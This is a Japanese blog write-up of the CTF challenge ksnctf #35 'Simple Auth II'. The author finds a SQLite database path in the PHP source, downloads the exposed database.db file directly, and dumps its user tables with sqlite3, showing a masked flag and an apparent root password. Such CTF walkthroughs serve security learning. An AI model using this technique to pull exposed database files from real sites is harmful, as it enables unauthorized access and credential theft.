Blog
ksnctf #35 Simple Auth II

ksnctf #35 Simple Auth II

September 17, 2017

問題

20170917180043.png

解き方

ソースコードが見れるので確認する。

PHPのソースコードはよくわからないが、以下のような記載があった。

$db = new PDO('sqlite:database.db');

DBの場所が記載されているので、URLから直接ダウンロードしてみる。

ttp://ctfq.sweetduet.info:10080/~q35/database.db

DBの中身を確認

SQLiteのDBのようなので接続してみる。

# Macの場合
~ ❯❯❯ sqlite3 Downloads/database.db                                                                ⏎
SQLite version 3.16.0 2016-11-04 19:09:39
Enter ".help" for usage hints.
sqlite> .tables
user   user2
sqlite> select * from user;
root|FLAG_*****************←ここにFLAG
sqlite> select * from user2;
root|GLDmNFJimveAAxyg_wSNp
sqlite>

その他

SQLインジェクションの問題だと思ったら違った。

参考

セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方- Amazonで購入
セキュリティコンテストのためのCTF問題集 Amazonで購入
体系的に学ぶ 安全なWebアプリケーションの作り方 第2版[固定版] 脆弱性が生まれる原理と対策の実践 Amazonで購入

闇のゲームを攻略したログインシェルで遊ぶ